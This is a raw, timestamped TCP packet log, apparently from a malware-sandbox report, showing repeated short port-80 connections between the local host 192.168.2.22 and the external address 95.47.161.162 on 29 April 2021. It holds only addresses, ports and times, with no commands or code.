                                          Apr 29, 2021 08:23:34.271121979 CEST4945180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:34.275758028 CEST804945295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:34.278510094 CEST4945280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:34.278989077 CEST4945280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:34.373681068 CEST804945295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:34.407383919 CEST804945295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:34.411189079 CEST4945280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:34.963181973 CEST4945280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:34.964083910 CEST4945380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:35.057610035 CEST804945295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:35.057758093 CEST4945280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:35.058500051 CEST804945395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:35.058671951 CEST4945380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:35.085056067 CEST4945380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:35.183022976 CEST804945395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:35.229091883 CEST804945395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:35.229245901 CEST4945380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:35.881105900 CEST4945380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:35.882313013 CEST4945480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:35.972235918 CEST804945495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:35.972371101 CEST4945480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:35.973766088 CEST4945480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:35.975615978 CEST804945395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:35.975727081 CEST4945380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.063841105 CEST804945495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.098089933 CEST804945495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.098340034 CEST4945480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.320601940 CEST4945480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.321813107 CEST4945580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.410311937 CEST804945495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.410408020 CEST4945480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.410828114 CEST804945595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.411014080 CEST4945580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.412252903 CEST4945580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.501859903 CEST804945595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.535362959 CEST804945595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.535763025 CEST4945580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.767184019 CEST4945580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.769129992 CEST4945680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.856785059 CEST804945595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.856945992 CEST4945580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.858035088 CEST804945695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.858144999 CEST4945680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.859251976 CEST4945680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:36.948798895 CEST804945695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.985173941 CEST804945695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:36.985502005 CEST4945680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.212888956 CEST4945680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.214574099 CEST4945780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.302280903 CEST804945695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:37.302367926 CEST4945680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.303618908 CEST804945795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:37.303730965 CEST4945780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.305062056 CEST4945780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.394640923 CEST804945795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:37.428684950 CEST804945795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:37.428956985 CEST4945780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.648282051 CEST4945780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.649915934 CEST4945880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.741476059 CEST804945795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:37.741503000 CEST804945895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:37.741714954 CEST4945880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.741715908 CEST4945780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.743182898 CEST4945880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:37.832104921 CEST804945895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:37.865976095 CEST804945895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:37.866132021 CEST4945880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.080034971 CEST4945880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.081024885 CEST4945980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.170042992 CEST804945895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:38.170130014 CEST4945880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.170557976 CEST804945995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:38.170694113 CEST4945980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.171437025 CEST4945980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.261204004 CEST804945995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:38.294384003 CEST804945995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:38.294629097 CEST4945980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.523921967 CEST4945980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.526426077 CEST4946080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.613168955 CEST804945995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:38.613365889 CEST4945980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.620515108 CEST804946095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:38.620651007 CEST4946080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.622042894 CEST4946080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.717426062 CEST804946095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:38.749775887 CEST804946095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:38.750037909 CEST4946080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.969013929 CEST4946080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:38.969952106 CEST4946180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.063303947 CEST804946095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.063451052 CEST4946080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.064393997 CEST804946195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.064496040 CEST4946180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.065876961 CEST4946180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.159910917 CEST804946195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.194204092 CEST804946195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.194401026 CEST4946180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.429306030 CEST4946180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.431750059 CEST4946280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.523869991 CEST804946195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.524003983 CEST4946180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.526190996 CEST804946295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.526454926 CEST4946280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.527808905 CEST4946280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.622426033 CEST804946295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.657037973 CEST804946295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.657399893 CEST4946280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.881525993 CEST4946280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.883152962 CEST4946380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.976758957 CEST804946295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.976968050 CEST4946280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.977570057 CEST804946395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:39.977669001 CEST4946380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:39.978475094 CEST4946380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.072721958 CEST804946395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:40.108839989 CEST804946395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:40.109216928 CEST4946380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.333668947 CEST4946380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.335309029 CEST4946480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.423044920 CEST804946495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:40.423130035 CEST4946480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.423877001 CEST4946480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.427917957 CEST804946395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:40.428010941 CEST4946380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.512590885 CEST804946495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:40.546618938 CEST804946495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:40.546861887 CEST4946480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.775027037 CEST4946480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.776992083 CEST4946580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.863535881 CEST804946495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:40.863652945 CEST4946480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.871269941 CEST804946595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:40.871376038 CEST4946580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.872823954 CEST4946580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:40.966995001 CEST804946595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.000818014 CEST804946595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.001082897 CEST4946580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.223824024 CEST4946580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.226246119 CEST4946680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.314390898 CEST804946695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.314569950 CEST4946680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.316462994 CEST4946680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.317931890 CEST804946595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.318092108 CEST4946580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.405153036 CEST804946695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.438505888 CEST804946695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.438899994 CEST4946680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.660717010 CEST4946680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.662508011 CEST4946780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.749260902 CEST804946695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.749450922 CEST4946680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.757211924 CEST804946795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.757411003 CEST4946780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.758727074 CEST4946780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:41.853029013 CEST804946795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.887953997 CEST804946795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:41.888268948 CEST4946780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.114650011 CEST4946780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.115964890 CEST4946880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.208889008 CEST804946795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:42.209005117 CEST4946780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.210536957 CEST804946895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:42.210648060 CEST4946880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.212184906 CEST4946880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.306200027 CEST804946895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:42.339983940 CEST804946895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:42.340223074 CEST4946880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.565287113 CEST4946880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.567329884 CEST4946980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.658375978 CEST804946995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:42.658560038 CEST4946980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.659478903 CEST804946895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:42.659547091 CEST4946880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.660339117 CEST4946980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:42.750689983 CEST804946995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:42.784445047 CEST804946995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:42.784624100 CEST4946980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.016602993 CEST4946980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.018667936 CEST4947080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.106967926 CEST804946995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.107134104 CEST4946980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.112942934 CEST804947095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.113112926 CEST4947080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.114468098 CEST4947080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.209100962 CEST804947095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.242408037 CEST804947095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.242636919 CEST4947080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.464631081 CEST4947080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.465589046 CEST4947180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.556052923 CEST804947195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.556242943 CEST4947180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.557630062 CEST4947180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.559691906 CEST804947095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.559782982 CEST4947080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.648489952 CEST804947195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.683438063 CEST804947195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.683631897 CEST4947180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.904527903 CEST4947180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.906424999 CEST4947280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.994749069 CEST804947195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.994808912 CEST804947295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:43.994909048 CEST4947280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.994908094 CEST4947180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:43.996218920 CEST4947280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.084323883 CEST804947295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:44.119332075 CEST804947295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:44.119627953 CEST4947280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.343205929 CEST4947280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.345627069 CEST4947380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.431602001 CEST804947295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:44.431726933 CEST4947280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.433975935 CEST804947395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:44.434180975 CEST4947380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.435489893 CEST4947380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.523749113 CEST804947395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:44.561414003 CEST804947395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:44.561713934 CEST4947380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.794944048 CEST4947380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.804167986 CEST4947480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.883909941 CEST804947395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:44.884071112 CEST4947380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.892287970 CEST804947495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:44.892375946 CEST4947480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.893280029 CEST4947480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:44.981754065 CEST804947495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.017296076 CEST804947495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.017362118 CEST4947480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.247961044 CEST4947480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.249988079 CEST4947580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.336590052 CEST804947495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.336678982 CEST4947480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.338567019 CEST804947595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.338735104 CEST4947580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.340107918 CEST4947580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.429044962 CEST804947595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.462308884 CEST804947595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.462599039 CEST4947580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.685677052 CEST4947580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.688153028 CEST4947680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.773730993 CEST804947595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.773834944 CEST4947580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.782239914 CEST804947695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.782454014 CEST4947680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.783958912 CEST4947680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:45.879534960 CEST804947695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.918180943 CEST804947695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:45.918601036 CEST4947680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.150799036 CEST4947680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.152679920 CEST4947780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.241806030 CEST804947795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:46.242021084 CEST4947780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.243427992 CEST4947780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.244959116 CEST804947695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:46.245187998 CEST4947680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.332756996 CEST804947795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:46.369015932 CEST804947795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:46.369225979 CEST4947780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.587702990 CEST4947780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.589082003 CEST4947880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.676847935 CEST804947795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:46.676945925 CEST4947780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.683511019 CEST804947895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:46.683661938 CEST4947880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.685139894 CEST4947880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:46.779203892 CEST804947895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:46.813312054 CEST804947895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:46.813630104 CEST4947880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.039264917 CEST4947880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.040373087 CEST4947980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.129987955 CEST804947995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:47.130130053 CEST4947980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.131195068 CEST4947980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.133490086 CEST804947895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:47.133605003 CEST4947880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.220685005 CEST804947995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:47.257323980 CEST804947995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:47.257476091 CEST4947980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.474421978 CEST4947980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.475799084 CEST4948080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.564445019 CEST804947995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:47.564582109 CEST4947980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.566147089 CEST804948095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:47.566258907 CEST4948080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.567349911 CEST4948080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.658417940 CEST804948095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:47.695215940 CEST804948095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:47.695507050 CEST4948080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.909600973 CEST4948080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:47.910912991 CEST4948180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.000097990 CEST804948095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.000212908 CEST4948080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.004941940 CEST804948195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.005105972 CEST4948180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.006076097 CEST4948180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.101154089 CEST804948195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.135432005 CEST804948195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.135598898 CEST4948180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.362787962 CEST4948180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.364089012 CEST4948280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.454811096 CEST804948295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.454940081 CEST4948280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.456270933 CEST4948280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.457021952 CEST804948195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.457123041 CEST4948180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.547169924 CEST804948295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.581422091 CEST804948295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.581729889 CEST4948280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.805560112 CEST4948280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.807979107 CEST4948380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.897804976 CEST804948295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.897993088 CEST4948280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.902225018 CEST804948395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:48.902333021 CEST4948380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.903702974 CEST4948380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:48.995217085 CEST804948395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.032598972 CEST804948395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.032810926 CEST4948380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.277621984 CEST4948380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.280004978 CEST4948480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.367995024 CEST804948395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.368041039 CEST804948495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.368096113 CEST4948380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.368169069 CEST4948480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.369448900 CEST4948480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.458484888 CEST804948495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.492302895 CEST804948495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.492381096 CEST4948480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.721606016 CEST4948480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.724095106 CEST4948580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.809756994 CEST804948495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.809875965 CEST4948480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.812582016 CEST804948595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.812737942 CEST4948580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.814110041 CEST4948580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:49.903814077 CEST804948595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.942615986 CEST804948595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:49.942919016 CEST4948580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.170523882 CEST4948580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.171313047 CEST4948680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.259385109 CEST804948595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:50.259485006 CEST804948695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:50.259537935 CEST4948580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.259607077 CEST4948680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:50.260924101 CEST4948680192.168.2.2295.47.161.162
